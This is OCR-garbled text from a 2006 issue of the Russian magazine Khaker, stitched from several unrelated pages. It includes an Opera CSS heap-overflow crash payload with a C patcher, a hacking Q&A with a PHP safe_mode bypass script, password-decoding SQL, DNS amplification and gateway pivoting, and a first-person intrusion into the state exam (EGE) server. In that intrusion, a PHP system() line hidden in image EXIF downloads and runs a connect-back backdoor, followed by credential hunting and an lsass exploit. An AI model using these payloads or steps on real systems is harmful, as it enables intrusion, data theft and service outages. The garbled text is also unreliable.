Вот только передать такую длинную строку 
по сети очень проблематично. Даже если 
жертва сидит на ЭЗІ_, атака растянется на 
несколько часов, и пользователь, скорее 
всего, просто закроет Оперу, или соедине- 
ние будет выбито по тайм-ауту. 

Но к счастью для хакеров, разработчики 
Оперы допустили двойную ошибку, исполь- 
зовав расширение слова до двойного слова. 
Со знаком, разумеется. Куда же без него! По 
правде говоря, за разработчиков это сделал 
компилятор — они лишь использовали не- 
правильное преобразование типов, но поль- 
зователям Оперы от этого ничуть не легче. 
Причем, это преобразование осуществляет- 
ся в функции, вызывающей п2к_ѵиІпегаЫу! 
Ниже приведен ее ключевой фрагмент с 
некоторыми сокращениями: 

Уязвимый код, вызывающий функцию 
п2к_ѵиІпегаЫу и передающий ей в качес- 
тве агд_1еп знаковое слово, расширенное 
(со знаком!) до двойного слова 

Іос_67В8АР50: 

тоѵ [езі+2СІп] , еах 

Ітр зИогі Іос_67В8АР78 

Іос_67В8АР62: 

тоѵзх еах, [еЬр+ ѵаг_Іепд{Гі_оѵЛ] 

; вот оно! расширение слова, хранящего длину 
; копируемой строки, до двойного слова со знаком 
; если длина строки превышает 7РРРГі байт, 

; то и результат превышает 7РРРРРРРІТ 

рызГі сіѵѵогсі ріг [езі+8] ; передаем агд_згс 

тоѵ есх, сіѵѵогсі_67Р9ЕР18 ; іГііз 

Іеа еах, [еЬр+ѵаг_250] ; получаем агд_1еп 

ризИ еах ; передаем агд_1еп 

саІІ п2к_ѵиІпегаЫу ; вызываем функцию 

Код функции довольно громоздкий и пото- 
му приведен не полностью. Под сокраще- 
ние, в частности, попала передача расши- 
ренного ЕАХ в переменную [ЕВР+ѵаг+250], 
но тот факт, что она передается, сокраща- 
ет длину переполняемой строки всего до 



Уязвимая функция глазами дизассемблера 
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Свежий сплоит для Орега 




8000И байт или 32 Кб, что вполне приемле- 
мо для атаки. 

Остается выяснить, что же это за строка 
такая и как она связана с пользователь- 
ским вводом (и связана ли вообще). Ответ 
дает функция 5иЬ_67В8СЭ10, вызываемая 
из п2к_ѵиІпегаЫу. 

Вот ее дизассемблерный текст: 

; переполняющая строка передается функции, 

; обрабатывающей шрифты. Это позволяет 
; предположить, что строка представляет собой 
; имя шрифта 

5иЬ_67В8СЭ1 0 ргос пеаг 

ризб [езр+0Сб+агд_0] 

; передаем «свой» аргумент в виЬ_67В8СС38 
саІІ зиЬ_67В8СС38 

; сіізазт-листинг подфункции зиЬ_67В8СС38 

зиЬ_67В8СС38 ргос пеаг 

агд_0 = бѵѵогсі ріг 8 

ризб езі 

тоѵ езі, [езр+агд_0] 

ризб о^зеі аЗегіІ 1 ; "ЗЕВІР" 

ризб езі 

саІІ зиЬ_67С2РС85 ; обработка шрифта 

рор есх 

Іезі еах, еах 

рор есх 

\г збоП Іос_67В8СС52 

хог еах, еах 

рор езі 

геіп 

Іос_67В8СС52: 

ризб оТСзеі: аЗапзЗегіМ); "5АІ\І5-5ЕВІЕ" 

ризб езі 

саІІ зиЬ_67С2РС85 ; обработка шрифта 

рор есх 

Іезі еах, еах 

рор есх 

\і- збогі Іос_67В8СС68 

ризб 1 

Іос_67В8СС65: 
рор еах 

рор езі 

геіп 



Іос_67В8СС68: 

ризб оТСзеІ аРапіазу ; "ЕАІЧТАЗУ" 

ризб езі 

саІІ зиЬ_67С2РС85; обработка шрифта 

Имена шрифтов сразу же бросаются в 
глаза. Ага! Значит, эта функция управляет 
стилем оформления страницы, загружая 
соответствующий шрифт. И это хорошо, 
потому что шрифты мы можем принуди- 
тельно менять через СЗЗ. Главное, чтобы 
длина имени шрифта (необязательно 
реально существующего, вполне сойдет 
и фиктивный) превышала 32 Кб. Вместе 
с именем может быть передан збіеІІ-код, 
который пойдет гулять по куче (динами- 
ческой памяти), основательно ее затирая. 

А технику переполнения кучи мы уже 
неоднократно рассматривали в прошлых 
номерах «Хакера». 

Ниже приведен код простейшего ехріоіі'а, 
«роняющего» Оперу версии 8.52 и более 
младших (впрочем, атака может не срабо- 
тать, если СЗЗ отключен): 

<5ТѴІ_Е іуре=1ех1/сзз>А { ЕОІЧТ-ЕАМШѴ: 35000х'А' 
} </5ТѴІ_Е> 

Это код простейшего СЗЗ-ехрІоіГа, 
вызывающий обрушение Оперы. 

Для ликвидации уязвимости необходимо 
скачать новую версию Оперы или ликвиди- 
ровать дыру собственными руками! Дейс- 
твительно, зачем перекачивать несколько 
мегабайт по модему, переустанавливать и т. 
д., когда нас и текущая версия вполне устра- 
ивает? Как известно, с каждой новой верси- 
ей программное обеспечение все толстеет 
и толстеет, становится неповоротливым, не 
принося никаких существенно новых фич. 
Всего-то и нужно, что заменить 67В8СР1 5: Л 
Іос_67В8СР1 С (7Сбі 05бі) на ЗВ Іос_67В8СР1 С 
(72бі 05бі). Если бы файл был неупакован, то это 
можно было бы сделать прямо в Иіеѵѵ'е, атак... 
нет. Конечно, распаковать орега.бІІ вполне 
возможно, тем более что АЗРаск — упаковщик 
вполне известный, но распаковка не всегда 
проходит успешно, и потом в разных местах 
начинают вылезать баги. 

Мы пойдем другим путем, прибегнув к оп-Ііпе 
раісбі'у, то есть запустим орега. ехе, дождемся 
распаковки орега. сІІІ и исправим байты прямо 
в оперативной памяти! Аналогичный подход 



может быть применен и к другим программам, 
не только к Опере, поэтому ниже приводится 
исходный текст простейшего универсального 
оп-Ііпе раісбіег'а. 

Исходный текст опііпе-патчера орега_ІоасІег.с 

#іпсіисІе <зісііо.6> 

#іпсіисІе <\л/і псіоѵѵз . б > 

#сІеТіпе МАХ_ЗІ2Е 1 6 //длина буфера для патча 
таіп(іпіагдс, сбаг**агдѵ) 

{ 

//объявляем переменные 

ЗТАРГПІРІІЧРО зі; РВОСЕ35_ІІ\ІЕОВМАТЮІ\І рі; 

ОѴѴОРЮ Г\І,ЕІ_; 

//имя исполняемого файл а для запуска 
ипзідпесі сбаг пате[]="орега.ехе"; 
ипзідпесі сбаг Ьи1 : [МАХ_ЗІ2Е]; 

//указываем, что и где мы будем патчить 
ипзідпесі сбаг ітр_1тот[] = "\х7Сб\х05б"; //оіб 
ипзідпесі сбагітр_іо[] ='\х72\х90"; //пеѵѵ 
ѵоісГітр^эГ = (ѵоіб*)0х67В8СЕ1С;//асІсІгезз 
ргіпЩ"ІоасІіпд&раісбіпд...\п"); 

// инициализация всех структур данных 
зі.сЬ = зігео^зі); тетзеі(&зі,0,зІ2ео^(зі)); 
тетзеІ(Ьи*,0,МАХ_ЗІ2Е); 

//запускаем оперу на выполнение, для простоты не 
// передавая ей аргументы командной строки 
СгеаіеРгосезз(0, пате, О, О, О, 
М0ВМА1__РВ10В1ТУ_С1_А55, 0, 0, &зі, &рі); 

//ждем 1 сек, в течение которой орега.сІІІ должна 
//загрузиться и распаковаться . Возможно, на 
// медленных ЦП это значение придется увеличить 
ЗІеер(ІООО); 

// проверка версии оперы перед патчем 
ВеасІРгосеззМетогу(рі.бРгосезз, ітр_оГ, Ьиі 1 , 
8Іг1еп(ітр_Згот), &І\І); 
іЦІ\І !=зІгІеп(ітр_1гогп)) 

{ргіпЩ"-ЕВВ:геасІіпд тетогу\х7\п"); геШгп -1 ;} 
іЦзігстр(ітр_кот,Ьи^)) 

{ргіпІі'С'-ЕРРмпсоггесІ: ѵегзіоп!\х7\п");ге1:игп -1 ;} 

// патчим условный знаковый переход Л_ на 
//беззнаковый ЗВ 

ШіеРгосеззМетогу(рі.бРгосезз, ітр_оГ, ітр_Іо, 
зігІеп(ітр_іо), &І\І); 

ІІ(І\І != зІгІеп(ітр_1:о)) 

|рг іп1:Т("-ЕР Р : ѵѵгііі пд тетогу\х7\п");геІигп -1 ;} 

// говорим ОК и сваливаем 
рппЩ"ОК\паІІ ок\п"); 

} 

Естественно, теперь каждый раз придется 
запускать не орега. ехе, а орега_1оабег.ехе. 
Впрочем, чтобы не напрягаться, достаточно 
всего лишь сменить ярлыки и файловые 
ассоциации. Правда, в силу небольшой конс- 
труктивной недоработки оп-Ііпе раісбіег'а, 
он не передает Опере аргументы команд- 
ной строки, поэтому если она установлена 
основным браузером по умолчанию, то 
бііт-файлы открываться не будут! Исполь- 
зуйте бгад-п-бгор или доработайте раісбіег 
«напильником» до законченной конструкции. 
Г лавное, что мы заткнули дыру своими собс- 
твенными силами, и нам не понадобились 
никакие обновления. =н= 



064 



ХАКЕР 07 /91/ 06 




Х-сопіезТ 



СПУСТЯ НЕКОТОРОЕ ВРЕМЯ, ПОДНАКОПИВ СИЛ И ИДЕЙ, МЫ СНОВА ЗАПУСКАЕМ 
Х-КОНКУРС, КОТОРЫМ БУДЕТ ЗАНИМАТЬСЯ БЛУДЕКС. ТАК ЧТО НЕ ЖДИ 
НИ СЕКУНДЫ - НЕМЕДЛЕННО ПРИНИМАЙСЯ ЗА НОВЫЙ ВЗЛОМ. А БЛУДЕКС 
РАССКАЖЕТ ТЕБЕ О ЗАДАЧЕ, КОТОРАЯ ПЕРЕД ТОБОЙ СТОИТ. 



В сети царит настоящий беспредел: на авторское право все уже давно положили и бес- 
препятственно перекачивают терабайты контрафактного контента. И в этом, на мой 
взгляд, нет ничего особенно плохого. В самом деле, что плохого в том, чтобы безвозмез- 
дно поделиться с товарищем купленной песенкой? Другое дело — наживаться на украден- 
ном контенте, продавать его. Это вот уже настоящее преступление против человечества, 
аморальная штука. 

Сегодня тебе понадобится вздрючить негодяев с копкигз.хакер.ги . которые заломили 
огромную цену за клиент к своей р2р-сетке. 

Когда проект под кодовым названием «Земля» еще только разрабатывался, стало ясно, 
что есть админы и хакеры. Например, Робин Гуд был хакером, потому что он отнимал 
деньги у богатых и давал деньги бедным. И ты будешь хакером, потому что сопрешь 
через баги р2р-сети файл ключей у одного из админов, который совсем нехороший чело- 
век, и выиграешь конкурс. За победу в конкурсе мы вручим тебе приз. 
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/ Ы8Т.ѴОЮ.ПІІ / / РОНВ@САМЕЬАЫО.Ни / 

НАСК- 




Маск-Таа@геаІ .хакер . ш 



О: В последнее время адми- 
ны уделяют много време- 
ни настройке РНР, поэтому 
я все чаще вижу защиту с 
помощью заІе_тосІе, да еще 
и с включенной функцией 
ореп_Ьазе_с!іг. Какие важ- 
ные функции могут спасти 
меня при таком нехорошем 
раскладе? 

А: Если посчитать на пальцах, то можно сге- 
нерировать следующий список «дуршлачных» 
функций, которые помогут взломать якобы 
защищенный сервер. Жаль, что не все фун- 
кции из ниже перечисленных присутствуют в 
дефолтном варианте РНР. Упорядочу их по 
актуальности на сегодняшний день: 

1. Функция сигІ_іпіІ() (нет по дефолту); 

2. Функция ІпсІибеО; 

3. Через взаимодействие с БД. Для возмож- 
ности осуществления должны быть соответс- 
твующие права в базе данных (учти, что базы 
на хостинге может и не быть); 

4. Функция тЬ_зепб_таіІ() (нет по дефолту); 

5. Функции ітар_ІізІ() ітар_Ьобу(); 

6 . Функция сору(). 

Уязвимые версии функций для того или иного 
релиза РНР ты можешь посмотреть на стра- 
ницах багтрака. 



А как мне определить, 
акая версия РНР находится 
хостера? 



А: Самый точный способ определения заклю- 
чается в загрузке на сервер файла іпТо.рНір с 
содержанием <?рйріпІо();?>. В информации 
о РНР ты быстро найдешь текущий релиз. 
Если же админ закрыл функцию рНіріпТо(), 
или у тебя слишком урезаны права — просто 
запроси несуществующую страницу на сер- 
вере. При включенной серверной подписи 
ты увидишь версию АрасИе, РНР и, возмож- 
но, других модулей. Учти: эту информацию 
можно легко подделать! 



О: Так, так. Как раз в моем 
случае админ врубил за!е_ 
то сіе и ограничил меня в 
домашней директории. 

Однако я изучил багтрак, 
определив, что в установ- 
ленной версии РНР присутс- 
твует ошибка в функции 
соруС). Как же мне теперь 
воспользоваться багом и 
достать необходимый мне 
файл? Документ лежит в 
/Иоте/Иаскег/пееС.іхІ, а я 
нахожусь в пределах /Йоте/ 
ІгееИовІа/риЫіс_И1тІ. 

А: А ты уже почти нашел ответ! Нужно было 
не только посмотреть уязвимую версию РНР, 
но и почитать ІиІІ бізсіозе в багтраке :). 

Если РНР действительно не пропатчен, то 
нужная информация уже почти у тебя в руках. 
Осталось только написать небольшой скрипт 



для эксплуатации данной уязвимости. 



<? 

$пеесІ1 : ІІе="Іпоте/Іпаскег/зр_з.М"; 

$оиіриіЛІе="/Іпоте/ігееІпозіа/риЫіс_ІпіітіІ/зр_з.М"; 

сору("сотргезз.2ІІЬ://".$пееШіІе,$ои1:риШІе); 

?> 



Заливаешь этот скрипт на сервер и откры- 
ваешь. Если луна находится в нужной фазе, 
то в риЫіс_йітІ должен появиться ожидае- 
мый файл. Не забывай про права доступа, 
а то потом будешь долго искать какой- 
то другой метод только из-за собственной 
невнимательности. 



О: Столкнулся с неприятным 
раскладом. Имеется хостинг 
с включенным ореп_Ьазе_ 
сііг. Также есть доступ на 
сервер, но я могу лишь про- 
сматривать файлы, стяну- 
тые багой в со ру () . Как бы 
мне еще и список каталогов 
посмотреть, чтобы ознако- 
миться со всеми файлами? 

А: Удобная система Іосаіе как раз может 
выдать тебе местоположение искомых фай- 
лов. А точнее, ее база, которая хранится в 
*В30 тут: /ѵаг/сІЬ/Іосаіе .сІаіаЬазе , а в І_іпих — в 
/ѵаг/ЧЬ/зІосаіе/зІосаІе.бЬ. Учти, что все зави- 
сит от прав, установленных на этом файле. 
Например, в РгееВЗО файл могут читать все, 
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а в І_іпих ЗІаскѴѴаге — только гооі и пользо- 
ватели группы зіосаіе. Если повезет, то ты 
можешь скопировать этот файл через сору(), 
а затем ознакомиться с иерархией каталогов 
и файлов в системе. 



О: Слил тут дамп одной 

МуЗСІІ-'ной базы. Там есть 
таблица с именем ивегв, а 
в ней — поле раззѵѵогсіз. 
Открыв у себя полученное 
добро, я ринулся смотреть 
на данные, которые должны 
быть в поле раззѵѵогсіз, но 
вместо ожидаемых хэшей я 
увидел там бинарный мусор. 
Как мне восстановить пер- 
возданные пароли в чистом 
тексте? 

А: А то, что там бинарные данные, ты, наверно, 
определил из типа поля раззѵѵогсіз (В1_0В)? Если 
так, то только на первый взгляд может показать- 
ся, что это мусор. В случае, когда у тебя под 
рукой имеются исходники скрипта, можно поис- 
кать там слово ЕІ4ССЮЕ, которое должно при- 
сутствовать в 301_-запросе. Если такое слово 
нашлось, то ты на правильном пути. ЕІ4ССЮЕ 
— это функция МуЗОЦ используемая для 
кодирования некой строки секретным ключом. 
Синтаксис ее таков: ЕЫСООЕ(«раззѵѵогсІ»,«ключ 
для кодирования»). Ключ, как правило, лежит в 
сценарии, формирующем базу. 

Чтобы декодировать пароли, тебе потребу- 
ется загрузить данные в свою базу данных, а 
затем выполнить нехитрый 301_-запрос: 



ЗЕЬЕСТ іізег, ОЕССЮЕфаззѵѵогсІз, «секретный 
ключ») Ітот изегз іпіо 01ЛРШЕ ‘пеѵѵизегз 1 ; 



В итоге вся читабельная информация сдам- 
пится в локальный файл пеѵѵизегз. 



О: Что такое рекурсивные 

ОЫ5-запросы и как с их помо- 
щью можно вызвать отказ в 
обслуживании (Оо$)? 

А: Чтобы разрешить эту проблему, необходи- 
мо немного углубиться в теорию. Различают 
два типа 0145-запросов: рекурсивные и ите- 
ративные. При рекурсивном запросе сервер 
имен должен найти информацию самостоя- 
тельно. То есть при получении рекурсивного 
запроса сервер имен, при отсутствии у него 
ответа на запрос, должен сам обратиться к 
помощи других серверов имен, например к 
корневым серверам (данный запрос будет 
итеративным). Они сами не дадут ответа, но 
зато направят тебя на другие 0145-серверы. 
Сервер имен будет проверять все предостав- 
ленные ему ссылки, пока не обнаружит необ- 
ходимую информацию. 

При итеративном запросе сервер имен дол- 
жен сразу предоставить ответ, не обращаясь 
к другим 0148-серверам. Если этот сервер не 
может предоставить запрошенную информа- 
цию, то он возвратит ссылку на другой сервер 



имен, который, вероятно, может дать ответ на 
запрошенную информацию. 

Как видно при рекурсивных запросах, все 
сложности, связанные с поиском ответа, 
ложатся на плечи 0143-сервера, и он вынуж- 
ден сам обращаться с запросами на другие 
0145-серверы и обрабатывать поступающую 
от них информацию. Таким образом, при 
большом количестве рекурсивных запросов к 
0148-серверу возможно исчерпывание ресур- 
сов сервера и отказ в обслуживании. 

Однако более вероятными и опасными явля- 
ются распределенные атаки с использова- 
нием 0143-серверов. Они с успехом могут 
применяться для распределенных 005-атак, 
так как они работают с ЬЮР-протоколом, и 
атакующему ничего не стоит подделать обрат- 
ный ІР-адрес. Отправка множества запросов 
на разные 0145-серверы с обратным адресом 
хоста-жертвы вызовет большой трафик от 
0143-серверов к атакуемому хосту-жертве. 
Серверы, поддерживающие рекурсию для 
распределенных атак, более предпочтитель- 
ны, так как от них будет больший коэффици- 
ент умножения, особенно при использовании 
ЕОІ43 (РРС 2671) запросов, когда коэффици- 
ент может достигать 60-ти и более. 



О: Зутііпк аііаск. Что это 

за уязвимость? Объясните, 
пожалуйста, данный вид уяз- 
вимости, как он применяется. 
Желательно с примерами. 

А: Основной проблемой некоторых программ 
является то, что перед работой с файлами они 
не проверяют, действительно ли файл, с кото- 
рым они будут работать, является реальным 
файлом, а не ссылкой. Таким образом, атаку- 
ющий может создать символическую ссылку 
на реальный файл в системе, и программа, 
работая со своим файлом, на самом деле 
будет работать с файлом, на который укажет 
атакующий. Для примера можно рассмотреть 
теоретическую программу, которая работает 
с временным файлом /ітр/іезі, и при выполне- 
нии меняет права доступа к файлу. Атакующий 
может создать символическую ссылку Дтр/ 
Іезі на файл /еіс/раззѵѵсі следующим образом: 
Іп -з /еіс/раззѵѵд АтрЛезі и программа, рабо- 
тая с файлом ДтрЛезі, на самом деле изменит 
права на /еіс/раззѵѵсі, конечно, при условии, 
что утилита запускается с рут-правами. 



О: В сети, которую я поло- 
мал, имеется внутренний 
сервер. Точнее, сначала мне 
сдался линуксовый шлюз, 
и я получил на нем рутовые 
права, устроив злободром в 
локалке. Хотелось бы сде- 
лать так, чтобы я мог обра- 
щаться к локальному сер- 
веру без промежуточного 
соединения со шлюзом 
А: Вопрос понятен. Подобная проблема осве- 
щалась в Наск-РАО 06/06, но в твоем случае 



разумнее всего применить технологию ОІ4АТ. 
Вбей следующее правило на шлюзе: 



ірІаЫез -і паі -А РНЕРЮІЛІІ40 -р іср -сірогі нуж- 
ный_порт -і ЭІЧАТ — іо-сіезііпаііоп локальный_хост: 
лежал ыный_порт. 



Теперь ты можешь обращаться к шлюзу на 
указанный тобой порт, а система будет реди- 
ректить тебя уже на внутреннем сервере. 
Учти, что админ может просмотреть правила 
ірІаЫез и запалить тебя на сервере :). 



О: Слышал, что МігаЬіІів 

логируют все ІСС)-перего- 
воры. Как-то стремно. По 
аське я часто общаюсь на 
хакерские темы, и не хотел 
бы, чтобы все мои бесе- 
ды потом кем-то изучались. 
Можно ли обойти это логи- 
рование, если оно вообще 
существует? 

А:3емля слухами полнится. Впрочем, запись 
всех переговоров — задача простая, и я 
не удивлюсь, если это окажется правдой. 
Защититься наверняка можно, взломав ѵѵѵѵѵѵ. 
ісд.сот. затем проникнуть в локалку и уда- 
лить все логи. Шутка :). Для каждого клиента 
есть плагины шифрования. С их помощью на 
сервер отправляется мусор, который рас- 
шифровывается уже на клиентской сторо- 
не. Например, я использую В&О с плагином 
5есигесІ_РЮ (можно скачать на сайте гпд.ги). 
Для пущей паранойи можно поставить свой 
ІСО-сервер (ізегѵегб, например) и общаться 
через него. А для доступа в глобальный мир 
ІСО использовать шлюз, который также опци- 
онально устанавливается в сервере аськи. 



О: У меня заблокирова- 

ли кошелек ѴѴеЬМопеу! 
Там находилась приличная 
сумма, которую не хочется 
терять. Как мне договорить- 
ся с ѴѴМ, чтобы вернуть себе 
все деньги? 

А: Залочить кошель могли по нескольким 
причинам. Например, если на него попала 
какая-то грязь, либо ты кого-то сильно оби- 
дел. А может, ты просто запустил кипер под 
ѴтѴѴаге. Сначала узнай причину блокиров- 
ки у арбитража ѴѴеЬМопеу ( Мр://агЫ1гаае. 
ѵѵеЬтопеѵ.ги/азр/сІеіаиІІ.азр У Если блокиров- 
ка произошла по серьезной причине, то тебе 
придется оформить на себя персональный 
аттестат ( ИДрѴ/раззрогІ.ѵѵеЬтопеѵ.ги ). затем 
кошелек должны разблокировать. Есть и 
другой способ: в случае правильности пер- 
сональных данных, которые ты вводил при 
регистрации (не спеши их менять — с актив- 
ной блокировкой ѴѴМЮ это невозможно), 
ничто не мешает открыть банковский счет 
на твое имя и попросить арбитража вывести 
заблокированную сумму на этот счет. По пра- 
вилам ѴѴеЬМопеу это допустимо, □с 
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ВЗЛОМАННЫЙ 

ГОСЭКЗАМЕН 



Штурмуем еде.еби.ги 












ВОТ И НАСТУПИЛ ИЮЛЬ. ДЛЯ КОГО-ТО ЭТО ПОЕЗДКА НА МОРЕ И 
ДОЛГОЖДАННЫЙ ОТДЫХ, А ДЛЯ ВЫПУСКНИКОВ ШКОЛ РОССИИ — ВРЕМЯ 
ПОСТУПЛЕНИЯ В ВУЗЫ. А ЧТОБЫ ПОПАСТЬ В ХОРОШИЙ УНИВЕР, НУЖНО 
ПОДНАПРЯЧЬСЯ НА ВСТУПИТЕЛЬНЫХ ЭКЗАМЕНАХ ИЛИ НАБРАТЬ ПРИЛИЧНЫЕ 
БАЛЛЫ НА ЕДИНОМ ГОСУДАРСТВЕННОМ ЭКЗАМЕНЕ (ЕГЭ). МОЖНО, КОНЕЧНО, 
ПОСТУПИТЬ ИНАЧЕ И ВЗЛОМАТЬ ОФИЦИАЛЬНОЕ ХРАНИЛИЩЕ РЕЗУЛЬТАТОВ 
ЕГЭ. ВЕДЬ ХАКЕРЫ НИКОГДА НЕ ИЩУТ ЛЕГКИХ ПУТЕЙ. 



День только начинался, и я, как всегда, смот- 
рел телевизор. В полусонном состоянии нажи- 
мал кнопки пульта, переключая каналы, пока 
не остановился на интересной программе, где 
рассказывали о новых проектах Министерства 
образования, в частности, о ЕГЭ: хорошо это, 
мол, или плохо, нужно оно или нет. Вообще, 
такие программы я не люблю, и, наверное, 
лереключил бы и этот канал, если бы разговор 
не зашел о невероятной информативности и 
безопасности, и плюс ко всему, 100% оценке 
знаний ученика. Весьма неплохо одетый чувак 
.сказал, что результаты по всей России стека- 
ются на единый сервер ЕГЭ — еае.есіи.ги . И 
что-то уж очень мне захотелось провести не- 
формальный аудит этого интересного объекта, 
■благо такая инфа очень дорого стоит. 

Первые шаги к победе 

Мой экран чист, в адресной строке находят- 
ся заветные слова — аЬоиГЫапк. Браузер 
ждет новой ссылки, а в его недрах уже вбита 
свежая анонимная прокся. И вот я лицезрею 
главную страницу еае.есіи.ги . Дизайн сайта 
мне понравился, да и рассчитан он был на 
■информативность. В первую очередь броси- 
лось в глаза то, что портал был написан на 
— языке, который взломать мне пока не 
по силам. Быстренько полазив по ссылкам, 
я понял, что легкой добычи не будет. Явных 
.ссылок, где было написано: «Вставь сюда 
ІісІІ — и ты выполнишь команды на сервере», 
конечно же, не было. Полчаса ползанья по 
сайту ничего не дало. Не было даже ни одной 
•захудалой хзз'ки, благодаря которой я теоре- 
тически мог бы утянуть чьи-то плюшки. Также 
не прослеживалось инклуд-бага и подозре- 
ний на инъекции. День явно складывался не в 
мою пользу. «Нет багов на сайте — попробую 
.просканировать сервер», — подумал я и за- 



пустил страшного зверя птар с параметрами 
еде.еби.ги -з8 -О-рІ-. Спустя 10 минут сканер 
"выдал мне следующую информацию. 

Зіагііпд птарѴ. 3.00(ѵѵѵѵѵѵ.іпзесиге.огд/птар/) 

Іпіегезііпд рогіз оп еде.есіи.ги (85. 1 42.20.50): 

(ТГіе 65432 рогіз зсаппесі Ьиі поі зіпоѵѵп Ьеіоѵѵ аге іп зіаіе: 
-сіозесі) 

Рогі Зіаіе Зегѵісе 

22/іср ГіІІегесІ ззГі 

80/іср ореп Гійр 

3128/іср йііегесі зциісІ-Гійр 

31 41 Дер ТіІІегесІ ѵтосіет 

3389Дср ТіІІегесІ тз-іегт-зегѵ 

Петоіе орегаііпд зузіет диезз: РгееВЗР 6.0 

Зри в картинку! 

Как видим, практически все порты на сервере 
фильтровались. Теоретически это не было 
"проблемой, так как залить соппЬаск-шелл 
-и получить консоль мне ничего не мешало. 
-Однако бажных сервисов в инфе птар'а я 
_тоже не видел :(. И я решил просканировать 
вручную главный портал — ѵѵѵѵѵѵ.еби.ги . Изна- 
чально проверив командой Рюзі соответствие 
ІР-адресов, я окончательно убедился в том, 
что ѵѵѵѵѵѵ.еби.ги и еае.есіи.ги находятся на 
одном сервере. Таким образом, было решено 
зайти на главный сайт и зарегистрироваться 
■там, чтобы еще глубже прощупать возмож- 
-ности интерфейса. Случается, что зарегист- 
рированные пользователи получают доступ к 
большему числу скриптов, нежели гости. И с 
“этой мыслью я перешел по вкладке регис- 
-трации. Весьма интересным оказался тот 
фэакт, что при регистрации возможен аплоад 
фотографии на сервер. Этот момент очень 
привлек мое внимание. 

Изначально я тупо переименовал рбр-файл 
-в картинку, надеясь на то, что скрипт сохра- 



нится в недрах системы, но обломался. Здесь 
программеры поработали на славу и включили 
распознавание контента (судя по сообщению 
— о некорректности изображения). Руки неволь- 
но опускались, и я начал понимать, что сломать 
ЕГЭ мне не по зубам. 

Но буквально через час я вспомнил, что рису- 
— нюк — это не просто изображение. В него мож- 
но вставлять различные тэги, которые в ряде 
случаев способны выполняться как команда. В 
моем случае это сделать достаточно реально. 
— Смотри: движок регистрации написан на РНР, 
— теоретически при показе рисунка скрипт тупо 
берет все его содержимое и сливает браузеру. 
Но при наличии вредных тэгов, обрамленных 
<? ?>, часть рисунка может интерпретировать- 
— ся как команда! 

Все эти мысли промелькнули в моей голове 
за пару секунд. Зайдя на страницу ѵѵѵѵѵѵ.еби. 
ги/іпбех.рИр?раае ісІ=13 . я аккуратно заполнил 
— все поля, представившись Исааком Моисее- 
— вичем Абрамсоном. Затем нашел в Гугле фо- 

тографию несчастного еврейского мальчика, 

слил ее на комп и открыл с помощью АсбЗее. 
Далее дело техники: в поле введения ЕХІР я за- 
— бил незамысловатую строку <?зуз1ет("іб");?> 
и бережно сохранил файл. Теперь мне ничего 
не оставалось, как просто загрузить фотку на 
сервер, не забывая отметить флажок «Пос- 
— тавьте флажок, если хотите опубликовать свои 
— данные на нашем сервере». 

Залив аццкий гифчик на сервер, я поспешил 
узреть свой профиль. Ура! Как я и думал, 
'изображения подгружаются не напрямую, а 
— через сценарий РНР. Однако вывода коман- • 
ды в исходниках рисунка я не увидел, собс- 
твенно, как и комментария. Это было стран- 
но, поскольку при самом плохом раскладе 
— я все равно должен был узреть мой коммен- 
— тарий. Проверить бажность движка можно 



ХАКЕР 0 



7 /91/ 0С _ 



069 



Сайт ЕГЭ собственной персоной 



Г лавный домен портала по образованию 




'с мертвой точки. Ан нет! Воспользоваться фряху грс-сісот эксплоит (еле нашел у себя 
■услугами Іосаіе я не мог — регтіззіоп сіепіесі. -на диске этот раритет), я выбрал первый 



Попробовав команду ІіпсІ / -пате *разз* -Із, я 
не нашел ничего, кроме /еіс/раззѵѵсі и какой- 
то фигни в /изг/зИаге. Примечательно, что 
■каталог /Йоте вообще не читался, поэтому 
ІіпсІ обошел его стороной. 

Но это совсем не значит, что ситуация без- 
выходная. Я прочитал /еіс/раззѵѵсі и нашел 
там 4 пользовательских аккаунта группы 
ѵѵИееІ с шеллом /Ьіп/ЬазИ. Один из них звал- 
ся апіопіс. Именно в его папку я сумел зайти 
командой об /Иоте/апіопіс. Следующая 
команда Із дала мне возможность ознако- 
миться с содержимым каталога. Почему я 
все это описываю? Да потому, что нашел 



таргет. Бинарник завис в ожидании и не 

хотел оживать. Как оказалось, виндовый 
"айпишник перестал пинговаться. Вся моя 
-жизнь пролетела перед глазами, и я уже 

представлял себя за решеткой. Но спустя 

пару минут айпишник снова ожил (похоже, 

что система ушла в экстренный ребут). Тог- 
~да я попробовал сплоит к баге Ізазз, потому 
— как последний вариант этого эксплоита 

более гуманно относился к операционным 

системам из-за излишней «отточенности» 
таргетов. Как ни странно, меня ждал успех 
— с первой попытки, так как 445 порт ничем не 
фильтровался, а заплаток к Ізазз на винде 



было лишь одним способом: попытаться 
залить и выполнить соппЬаск-шелл. Для это- 
го мне пришлось снова регистрироваться, но 
уже под именем Абрам Исаакович Шпиль- 
ман. Картинка была та же, но подверглась 
ужасной трепанации. Запрос вырос в разы и 
стал выглядеть так: <?зузІет("ѵѵде1 ааЫэсс4. 
сПаі.ги/ЬсІ -О/Ітр/Ь; сНтосІ +хДтр/Ь; Дтр/Ь 
1 .1 .1 . 1 ");?>, где Ь был свежескомпиленный 
под РгееВЗО бэкдор (мое чутье подсказыва- 
ло мне, что воспользоваться услугами дсс 
через ѴѴѴѴѴѴ было нельзя). 

Итак, я опять поспешил в свой профиль, 
заботливо запустив пеісаі на своем шелле 
сір 1.1.1.1. И, о чудо! В консоли появились 
заветные строчки о том, что соппЬаск со- 
единился с моим сервером. 

Первые сдвиги были налицо. Освоившись в 
системе, я узрел, что на сервере крутилась 
база МуЗОІ_. Она и привлекла мое внима- 
ние. Первое, что я сделал, — это перешел 
в каталог $Н ОМЕ и попытался прочитать 
какие-либо конфиги. Но, как оказалось, 
АрасИе был настроен с зиехес, поэтому 
прочесть каталог ІіЬ мне никак не удавалось. 
Неприятен был еще один факт: на серве- 
ре действительно был запрещен дсс, но 
данное ограничение я уже обошел. Набрав - 
команду ѵѵііо, я увидел вполне себе живого 
админа, так что решил убраться восвояси до 
наступления сумерек. 



там каталог 1 с файлом разз.ЪФ Внутри него отродясь не стояло. 

красовалась живописная строка: «Сменить Команда «пеі зіагі» показала наличие встро- 
ена 11039423-02». Первое, что я хотел еде- — енного файрвола и гетоіе сіезкіор (видимо, 

■лать, — попробовать этот пароль на консоль — этот дедик использовался для рутинной 
(может, моя радость была преждевремен- работы под ѴѴіпсІоѵѵз :)). На единственном 
ной, и Антоник записал какой-то другой диске С:\ находились какие-то документы, 

пароль). ИітІ/рНр-файлы и, по-видимому, архив 

